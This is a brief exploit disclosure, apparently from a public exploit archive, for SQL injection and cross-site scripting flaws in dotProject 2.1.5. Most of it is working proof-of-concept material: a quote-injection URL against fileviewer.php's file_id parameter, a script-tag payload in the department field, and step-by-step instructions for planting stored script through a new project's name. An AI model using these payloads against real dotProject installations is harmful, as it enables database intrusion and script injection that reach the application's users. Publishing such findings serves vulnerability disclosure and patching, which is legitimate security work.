35 lines
No EOL
953 B
Text
35 lines
No EOL
953 B
Text
# exploit title: sql injection in dotproject 2.1.5
|
|
# date 21.o2.2o11
|
|
# author: lemlajt
|
|
# software : dotproject
|
|
# version: 2.1.5
|
|
# tested on: linux
|
|
# cve :
|
|
# http://dotproject.net/
|
|
|
|
|
|
PoC :
|
|
http://localhost/www/cmsadmins/dotpro/dotproject/fileviewer.php?file_id='
|
|
|
|
in src:
|
|
2 ./dotproject/fileviewer.php:
|
|
127 db_loadHash('SELECT * FROM (`dotp_files`) WHERE file_id = -9',NULL)
|
|
|
|
another xss/sqli is here:
|
|
POST http://localhost/www/cmsadmins/dotpro/dotproject/index.php?m=projects
|
|
$department=company_1"><script>alert(1)</script>
|
|
|
|
we get an error with sql infos and xss.
|
|
|
|
1. visit
|
|
http://localhost/www/cmsadmins/dotpro/dotproject/index.php?m=projects&a=addedit
|
|
(adding new project)
|
|
2. POST $project_name="><script>
|
|
persistant.here</script> and choose 'company' to submit the form.
|
|
3. to see some affects just visit new project page: (in this example)
|
|
http://localhost/www/cmsadmins/dotpro/dotproject/index.php?m=projects&a=view&project_id=2
|
|
|
|
# *
|
|
regards!
|
|
|
|
o/ |